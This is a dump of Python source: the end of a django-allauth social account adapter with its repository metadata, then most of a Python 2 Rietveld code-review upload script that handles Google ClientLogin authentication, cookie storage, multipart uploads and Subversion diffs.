class DefaultSocialAccountAdapter(object):
def pre_social_login(self, request, sociallogin):
"""
Invoked just after a user successfully authenticates via a
social provider, but before the login is actually processed
(and before the pre_social_login signal is emitted).
You can use this hook to intervene, e.g. abort the login by
raising an ImmediateHttpResponse
Why both an adapter hook and the signal? Intervening in
e.g. the flow from within a signal handler is bad -- multiple
handlers may be active and are executed in undetermined order.
"""
pass
def populate_new_user(self,
username=None,
first_name=None,
last_name=None,
email=None,
name=None):
"""
Spawns a new User instance, safely and leniently populating
several common fields.
"""
user = get_user_model()()
user.username = username or ''
user.email = valid_email_or_none(email) or ''
        name_parts = (name or '').partition(' ')
user.first_name = first_name or name_parts[0]
user.last_name = last_name or name_parts[2]
return user
def get_adapter():
return import_attribute(app_settings.ADAPTER)()
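# Illustrative sketch (not part of allauth): how a social provider integration
# might use the adapter to build an unsaved User from an OAuth profile payload.
# The keys looked up in `extra_data` are assumptions for the example.
def _example_populate(extra_data):
    adapter = get_adapter()
    return adapter.populate_new_user(
        username=extra_data.get('login'),
        email=extra_data.get('email'),
        name=extra_data.get('name'))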
| {
"content_hash": "dd86471cfb4cd8b8cf8b80d1e9df5756",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 70,
"avg_line_length": 33.65217391304348,
"alnum_prop": 0.5742894056847545,
"repo_name": "Suite5/DataColibri",
"id": "266532126c0d549917105eb45e9be67d6f03ea3a",
"size": "1548",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "allauth/socialaccount/adapter.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "381"
},
{
"name": "CSS",
"bytes": "944246"
},
{
"name": "HTML",
"bytes": "566711"
},
{
"name": "JavaScript",
"bytes": "1510227"
},
{
"name": "PHP",
"bytes": "972"
},
{
"name": "Python",
"bytes": "1046512"
},
{
"name": "Shell",
"bytes": "79"
}
],
"symlink_target": ""
} |
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import ConfigParser
import cookielib
import fnmatch
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
try:
import keyring
except ImportError:
keyring = None
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
verbosity = 1
# The account type used for authentication.
# This line could be changed by the review server (see handler for
# upload.py).
AUTH_ACCOUNT_TYPE = "GOOGLE"
# URL of the default review server. As for AUTH_ACCOUNT_TYPE, this line could be
# changed by the review server (see handler for upload.py).
DEFAULT_REVIEW_SERVER = "codereview.arcbees.com"
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# Constants for version control names. Used by GuessVCSName.
VCS_GIT = "Git"
VCS_MERCURIAL = "Mercurial"
VCS_SUBVERSION = "Subversion"
VCS_UNKNOWN = "Unknown"
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = ['application/javascript', 'application/x-javascript',
'application/xml', 'application/x-freemind',
'application/x-sh']
VCS_ABBREVIATIONS = {
VCS_MERCURIAL.lower(): VCS_MERCURIAL,
"hg": VCS_MERCURIAL,
VCS_SUBVERSION.lower(): VCS_SUBVERSION,
"svn": VCS_SUBVERSION,
VCS_GIT.lower(): VCS_GIT,
}
# The result of parsing Subversion's [auto-props] setting.
svn_auto_props_map = None
def GetEmail(prompt):
"""Prompts the user for their email address and returns it.
The last used email address is saved to a file and offered up as a suggestion
to the user. If the user presses enter without typing in anything the last
used email address is used. If the user enters a new address, it is saved
for next time we prompt.
"""
last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
last_email = ""
if os.path.exists(last_email_file_name):
try:
last_email_file = open(last_email_file_name, "r")
last_email = last_email_file.readline().strip("\n")
last_email_file.close()
prompt += " [%s]" % last_email
except IOError, e:
pass
email = raw_input(prompt + ": ").strip()
if email:
try:
last_email_file = open(last_email_file_name, "w")
last_email_file.write(email)
last_email_file.close()
except IOError, e:
pass
else:
email = last_email
return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
"""Print an error message to stderr and exit."""
print >>sys.stderr, msg
sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
"""Raised to indicate there was an error authenticating with ClientLogin."""
def __init__(self, url, code, msg, headers, args):
urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
self.args = args
self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={},
save_cookies=False, account_type=AUTH_ACCOUNT_TYPE):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
account_type: Account type used for authentication. Defaults to
AUTH_ACCOUNT_TYPE.
"""
self.host = host
if (not self.host.startswith("http://") and
not self.host.startswith("https://")):
self.host = "http://" + self.host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.account_type = account_type
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = self.account_type
if self.host.endswith(".google.com"):
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=")
for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg,
e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("%s/_ah/login?%s" %
(self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg,
response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.\n"
"If you are using a Google Apps account the URL is:\n"
"https://www.google.com/a/yourdomain.com/UnlockCaptcha")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, ("The user's access to the service has been "
"disabled.")
break
if e.reason == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
extra_headers=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
extra_headers: Dict containing additional HTTP headers that should be
included in the request (string header names mapped to their values),
or None to not include any additional headers.
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
if extra_headers:
for header, value in extra_headers.items():
req.add_header(header, value)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
## elif e.code >= 500 and e.code < 600:
## # Server Error - try again.
## continue
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
"""Provides a simplified RPC-style interface for HTTP requests."""
def _Authenticate(self):
"""Save the cookie jar after authentication."""
super(HttpRpcServer, self)._Authenticate()
if self.save_cookies:
StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
self.cookie_jar.save()
def _GetOpener(self):
"""Returns an OpenerDirector that supports cookies and ignores redirects.
Returns:
A urllib2.OpenerDirector object.
"""
opener = urllib2.OpenerDirector()
opener.add_handler(urllib2.ProxyHandler())
opener.add_handler(urllib2.UnknownHandler())
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPDefaultErrorHandler())
opener.add_handler(urllib2.HTTPSHandler())
opener.add_handler(urllib2.HTTPErrorProcessor())
if self.save_cookies:
self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies")
self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
if os.path.exists(self.cookie_file):
try:
self.cookie_jar.load()
self.authenticated = True
StatusUpdate("Loaded authentication cookies from %s" %
self.cookie_file)
except (cookielib.LoadError, IOError):
# Failed to load cookies - just ignore them.
pass
else:
# Create an empty cookie file with mode 600
fd = os.open(self.cookie_file, os.O_CREAT, 0600)
os.close(fd)
# Always chmod the cookie file
os.chmod(self.cookie_file, 0600)
else:
      # Don't save cookies across runs of upload.py.
self.cookie_jar = cookielib.CookieJar()
opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
return opener
parser = optparse.OptionParser(usage="%prog [options] [-- diff_options]")
parser.add_option("-y", "--assume_yes", action="store_true",
dest="assume_yes", default=False,
help="Assume that the answer to yes/no questions is 'yes'.")
# Logging
group = parser.add_option_group("Logging options")
group.add_option("-q", "--quiet", action="store_const", const=0,
dest="verbose", help="Print errors only.")
group.add_option("-v", "--verbose", action="store_const", const=2,
dest="verbose", default=1,
help="Print info level logs (default).")
group.add_option("--noisy", action="store_const", const=3,
dest="verbose", help="Print all logs.")
# Review server
group = parser.add_option_group("Review server options")
group.add_option("-s", "--server", action="store", dest="server",
default=DEFAULT_REVIEW_SERVER,
metavar="SERVER",
help=("The server to upload to. The format is host[:port]. "
"Defaults to '%default'."))
group.add_option("-e", "--email", action="store", dest="email",
metavar="EMAIL", default=None,
help="The username to use. Will prompt if omitted.")
group.add_option("-H", "--host", action="store", dest="host",
metavar="HOST", default=None,
help="Overrides the Host header sent with all RPCs.")
group.add_option("--no_cookies", action="store_false",
dest="save_cookies", default=True,
help="Do not save authentication cookies to local disk.")
group.add_option("--account_type", action="store", dest="account_type",
metavar="TYPE", default=AUTH_ACCOUNT_TYPE,
choices=["GOOGLE", "HOSTED"],
help=("Override the default account type "
"(defaults to '%default', "
"valid choices are 'GOOGLE' and 'HOSTED')."))
# Issue
group = parser.add_option_group("Issue options")
group.add_option("-d", "--description", action="store", dest="description",
metavar="DESCRIPTION", default=None,
help="Optional description when creating an issue.")
group.add_option("-f", "--description_file", action="store",
dest="description_file", metavar="DESCRIPTION_FILE",
default=None,
help="Optional path of a file that contains "
"the description when creating an issue.")
group.add_option("-r", "--reviewers", action="store", dest="reviewers",
metavar="REVIEWERS", default=None,
help="Add reviewers (comma separated email addresses).")
group.add_option("--cc", action="store", dest="cc",
metavar="CC", default=None,
help="Add CC (comma separated email addresses).")
group.add_option("--private", action="store_true", dest="private",
default=False,
help="Make the issue restricted to reviewers and those CCed")
# Upload options
group = parser.add_option_group("Patch options")
group.add_option("-m", "--message", action="store", dest="message",
metavar="MESSAGE", default=None,
help="A message to identify the patch. "
"Will prompt if omitted.")
group.add_option("-i", "--issue", type="int", action="store",
metavar="ISSUE", default=None,
help="Issue number to which to add. Defaults to new issue.")
group.add_option("--base_url", action="store", dest="base_url", default=None,
help="Base repository URL (listed as \"Base URL\" when "
"viewing issue). If omitted, will be guessed automatically "
"for SVN repos and left blank for others.")
group.add_option("--download_base", action="store_true",
dest="download_base", default=False,
help="Base files will be downloaded by the server "
"(side-by-side diffs may not work on files with CRs).")
group.add_option("--rev", action="store", dest="revision",
metavar="REV", default=None,
help="Base revision/branch/tree to diff against. Use "
"rev1:rev2 range to review already committed changeset.")
group.add_option("--send_mail", action="store_true",
dest="send_mail", default=False,
help="Send notification email to reviewers.")
group.add_option("--vcs", action="store", dest="vcs",
metavar="VCS", default=None,
help=("Version control system (optional, usually upload.py "
"already guesses the right VCS)."))
group.add_option("--emulate_svn_auto_props", action="store_true",
dest="emulate_svn_auto_props", default=False,
help=("Emulate Subversion's auto properties feature."))
def GetRpcServer(server, email=None, host_override=None, save_cookies=True,
account_type=AUTH_ACCOUNT_TYPE):
"""Returns an instance of an AbstractRpcServer.
Args:
server: String containing the review server URL.
email: String containing user's email address.
host_override: If not None, string containing an alternate hostname to use
in the host header.
save_cookies: Whether authentication cookies should be saved to disk.
account_type: Account type for authentication, either 'GOOGLE'
or 'HOSTED'. Defaults to AUTH_ACCOUNT_TYPE.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
rpc_server_class = HttpRpcServer
# If this is the dev_appserver, use fake authentication.
host = (host_override or server).lower()
if host == "localhost" or host.startswith("localhost:"):
if email is None:
      email = "test@example.com"
logging.info("Using debug user %s. Override with --email" % email)
server = rpc_server_class(
server,
lambda: (email, "password"),
host_override=host_override,
extra_headers={"Cookie":
'dev_appserver_login="%s:False"' % email},
save_cookies=save_cookies,
account_type=account_type)
# Don't try to talk to ClientLogin.
server.authenticated = True
return server
def GetUserCredentials():
"""Prompts the user for a username and password."""
# Create a local alias to the email variable to avoid Python's crazy
# scoping rules.
local_email = email
if local_email is None:
local_email = GetEmail("Email (login for uploading to %s)" % server)
password = None
if keyring:
password = keyring.get_password(host, local_email)
if password is not None:
print "Using password from system keyring."
else:
password = getpass.getpass("Password for %s: " % local_email)
if keyring:
answer = raw_input("Store password in system keyring?(y/N) ").strip()
if answer == "y":
keyring.set_password(host, local_email, password)
return (local_email, password)
return rpc_server_class(server,
GetUserCredentials,
host_override=host_override,
save_cookies=save_cookies)
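# Illustrative sketch (not in the original script): obtain an RPC handle for a
# review server and fetch one issue's metadata. The API path here is a
# placeholder; Send() triggers the interactive ClientLogin flow if the request
# needs authentication.
def _ExampleFetchIssue(server, issue_id):
  rpc = GetRpcServer(server, save_cookies=False)
  return rpc.Send("/api/%d" % issue_id, payload=None)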
def EncodeMultipartFormData(fields, files):
"""Encode form fields for multipart/form-data.
Args:
fields: A sequence of (name, value) elements for regular form fields.
files: A sequence of (name, filename, value) elements for data to be
uploaded as files.
Returns:
(content_type, body) ready for httplib.HTTP instance.
Source:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
"""
BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
CRLF = '\r\n'
lines = []
for (key, value) in fields:
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"' % key)
lines.append('')
if isinstance(value, unicode):
value = value.encode('utf-8')
lines.append(value)
for (key, filename, value) in files:
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename))
lines.append('Content-Type: %s' % GetContentType(filename))
lines.append('')
if isinstance(value, unicode):
value = value.encode('utf-8')
lines.append(value)
lines.append('--' + BOUNDARY + '--')
lines.append('')
body = CRLF.join(lines)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def GetContentType(filename):
"""Helper to guess the content-type from the filename."""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
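# Illustrative sketch (not in the original script): encode a couple of form
# fields plus one file the same way the upload requests above do. The field
# names and diff text are made up for the example.
def _ExampleEncodeForm():
  ctype, body = EncodeMultipartFormData(
      [("subject", "Example issue"), ("description", "Hedged example only")],
      [("data", "example.diff", "--- a/file\n+++ b/file\n")])
  return ctype, len(body)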
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
universal_newlines=True,
env=os.environ):
"""Executes a command and returns the output from stdout and the return code.
Args:
command: Command to execute.
print_output: If True, the output is printed to stdout.
If False, both stdout and stderr are ignored.
universal_newlines: Use universal_newlines flag (default: True).
Returns:
Tuple (output, return code)
"""
logging.info("Running %s", command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=use_shell, universal_newlines=universal_newlines,
env=env)
if print_output:
output_array = []
while True:
line = p.stdout.readline()
if not line:
break
print line.strip("\n")
output_array.append(line)
output = "".join(output_array)
else:
output = p.stdout.read()
p.wait()
errout = p.stderr.read()
if print_output and errout:
print >>sys.stderr, errout
p.stdout.close()
p.stderr.close()
return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
print_output=False, env=os.environ):
data, retcode = RunShellWithReturnCode(command, print_output,
universal_newlines, env)
if retcode:
ErrorExit("Got error status from %s:\n%s" % (command, data))
if not silent_ok and not data:
ErrorExit("No output from %s" % command)
return data
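# Illustrative sketch (not in the original script): RunShell is the workhorse for
# querying the local VCS; for example, the current Git branch name could be read
# like this (assumes git is on the PATH).
def _ExampleCurrentGitBranch():
  output = RunShell(["git", "rev-parse", "--abbrev-ref", "HEAD"], silent_ok=True)
  return output.strip()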
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def PostProcessDiff(self, diff):
"""Return the diff with any special post processing this VCS needs, e.g.
to include an svn-style "Index:"."""
return diff
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
      prompt = "Are you sure you want to continue? (y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = filename.strip().replace('\\', '/')
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields,
[("data", filename, content)])
response_body = rpc_server.Send(url, body,
content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
      if base_content is not None:
        UploadFile(filename, file_id, base_content, is_binary, status, True)
      if new_content is not None:
        UploadFile(filename, file_id, new_content, is_binary, status, False)
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
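# Illustrative sketch (not part of the original script): how the mimetype
# checks above behave for a few sample filenames. Defined here purely as an
# example; nothing calls it.
def _ExampleMimetypeChecks():
  """Shows what mimetypes.guess_type() returns for typical filenames."""
  assert mimetypes.guess_type("photo.png")[0].startswith("image/")  # image
  assert mimetypes.guess_type("notes.txt")[0].startswith("text/")   # text
  # Files without a known extension (e.g. "README") yield None, which
  # IsBinary treats as "not binary".
  assert mimetypes.guess_type("README")[0] is None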
class SubversionVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Subversion."""
def __init__(self, options):
super(SubversionVCS, self).__init__(options)
if self.options.revision:
match = re.match(r"(\d+)(:(\d+))?", self.options.revision)
if not match:
ErrorExit("Invalid Subversion revision %s." % self.options.revision)
self.rev_start = match.group(1)
self.rev_end = match.group(3)
else:
self.rev_start = self.rev_end = None
# Cache output from "svn list -r REVNO dirname".
    # Keys: dirname, Values: 2-tuple (output for start rev and end rev).
self.svnls_cache = {}
# Base URL is required to fetch files deleted in an older revision.
# Result is cached to not guess it over and over again in GetBaseFile().
required = self.options.download_base or self.options.revision is not None
self.svn_base = self._GuessBase(required)
def GuessBase(self, required):
"""Wrapper for _GuessBase."""
return self.svn_base
def _GuessBase(self, required):
"""Returns the SVN base URL.
Args:
required: If true, exits if the url can't be guessed, otherwise None is
returned.
"""
info = RunShell(["svn", "info"])
for line in info.splitlines():
words = line.split()
if len(words) == 2 and words[0] == "URL:":
url = words[1]
scheme, netloc, path, params, query, fragment = urlparse.urlparse(url)
username, netloc = urllib.splituser(netloc)
if username:
logging.info("Removed username from base URL")
if netloc.endswith("svn.python.org"):
if netloc == "svn.python.org":
if path.startswith("/projects/"):
path = path[9:]
elif netloc != "[email protected]":
ErrorExit("Unrecognized Python URL: %s" % url)
base = "http://svn.python.org/view/*checkout*%s/" % path
logging.info("Guessed Python base = %s", base)
elif netloc.endswith("svn.collab.net"):
if path.startswith("/repos/"):
path = path[6:]
base = "http://svn.collab.net/viewvc/*checkout*%s/" % path
logging.info("Guessed CollabNet base = %s", base)
elif netloc.endswith(".googlecode.com"):
path = path + "/"
base = urlparse.urlunparse(("http", netloc, path, params,
query, fragment))
logging.info("Guessed Google Code base = %s", base)
else:
path = path + "/"
base = urlparse.urlunparse((scheme, netloc, path, params,
query, fragment))
logging.info("Guessed base = %s", base)
return base
if required:
ErrorExit("Can't find URL in output from svn info")
return None
def GenerateDiff(self, args):
cmd = ["svn", "diff"]
if self.options.revision:
cmd += ["-r", self.options.revision]
cmd.extend(args)
data = RunShell(cmd)
count = 0
for line in data.splitlines():
if line.startswith("Index:") or line.startswith("Property changes on:"):
count += 1
logging.info(line)
if not count:
ErrorExit("No valid patches found in output from svn diff")
return data
def _CollapseKeywords(self, content, keyword_str):
"""Collapses SVN keywords."""
# svn cat translates keywords but svn diff doesn't. As a result of this
# behavior patching.PatchChunks() fails with a chunk mismatch error.
# This part was originally written by the Review Board development team
# who had the same problem (http://reviews.review-board.org/r/276/).
# Mapping of keywords to known aliases
svn_keywords = {
# Standard keywords
'Date': ['Date', 'LastChangedDate'],
'Revision': ['Revision', 'LastChangedRevision', 'Rev'],
'Author': ['Author', 'LastChangedBy'],
'HeadURL': ['HeadURL', 'URL'],
'Id': ['Id'],
# Aliases
'LastChangedDate': ['LastChangedDate', 'Date'],
'LastChangedRevision': ['LastChangedRevision', 'Rev', 'Revision'],
'LastChangedBy': ['LastChangedBy', 'Author'],
'URL': ['URL', 'HeadURL'],
}
def repl(m):
if m.group(2):
return "$%s::%s$" % (m.group(1), " " * len(m.group(3)))
return "$%s$" % m.group(1)
keywords = [keyword
for name in keyword_str.split(" ")
for keyword in svn_keywords.get(name, [])]
return re.sub(r"\$(%s):(:?)([^\$]+)\$" % '|'.join(keywords), repl, content)
def GetUnknownFiles(self):
status = RunShell(["svn", "status", "--ignore-externals"], silent_ok=True)
unknown_files = []
for line in status.split("\n"):
if line and line[0] == "?":
unknown_files.append(line)
return unknown_files
def ReadFile(self, filename):
"""Returns the contents of a file."""
file = open(filename, 'rb')
result = ""
try:
result = file.read()
finally:
file.close()
return result
def GetStatus(self, filename):
"""Returns the status of a file."""
if not self.options.revision:
status = RunShell(["svn", "status", "--ignore-externals", filename])
if not status:
ErrorExit("svn status returned no output for %s" % filename)
status_lines = status.splitlines()
# If file is in a cl, the output will begin with
# "\n--- Changelist 'cl_name':\n". See
# http://svn.collab.net/repos/svn/trunk/notes/changelist-design.txt
if (len(status_lines) == 3 and
not status_lines[0] and
status_lines[1].startswith("--- Changelist")):
status = status_lines[2]
else:
status = status_lines[0]
# If we have a revision to diff against we need to run "svn list"
# for the old and the new revision and compare the results to get
# the correct status for a file.
else:
dirname, relfilename = os.path.split(filename)
if dirname not in self.svnls_cache:
cmd = ["svn", "list", "-r", self.rev_start, dirname or "."]
out, returncode = RunShellWithReturnCode(cmd)
if returncode:
ErrorExit("Failed to get status for %s." % filename)
old_files = out.splitlines()
args = ["svn", "list"]
if self.rev_end:
args += ["-r", self.rev_end]
cmd = args + [dirname or "."]
out, returncode = RunShellWithReturnCode(cmd)
if returncode:
ErrorExit("Failed to run command %s" % cmd)
self.svnls_cache[dirname] = (old_files, out.splitlines())
old_files, new_files = self.svnls_cache[dirname]
      # Pad to the width of "svn status" output so that the later indexing
      # (status[3], status[0:5]) stays in range.
      if relfilename in old_files and relfilename not in new_files:
        status = "D      "
      elif relfilename in old_files and relfilename in new_files:
        status = "M      "
      else:
        status = "A      "
return status
def GetBaseFile(self, filename):
status = self.GetStatus(filename)
base_content = None
new_content = None
# If a file is copied its status will be "A +", which signifies
# "addition-with-history". See "svn st" for more information. We need to
# upload the original file or else diff parsing will fail if the file was
# edited.
if status[0] == "A" and status[3] != "+":
# We'll need to upload the new content if we're adding a binary file
# since diff's output won't contain it.
mimetype = RunShell(["svn", "propget", "svn:mime-type", filename],
silent_ok=True)
base_content = ""
is_binary = bool(mimetype) and not mimetype.startswith("text/")
if is_binary and self.IsImage(filename):
new_content = self.ReadFile(filename)
elif (status[0] in ("M", "D", "R") or
(status[0] == "A" and status[3] == "+") or # Copied file.
(status[0] == " " and status[1] == "M")): # Property change.
args = []
if self.options.revision:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
else:
# Don't change filename, it's needed later.
url = filename
args += ["-r", "BASE"]
cmd = ["svn"] + args + ["propget", "svn:mime-type", url]
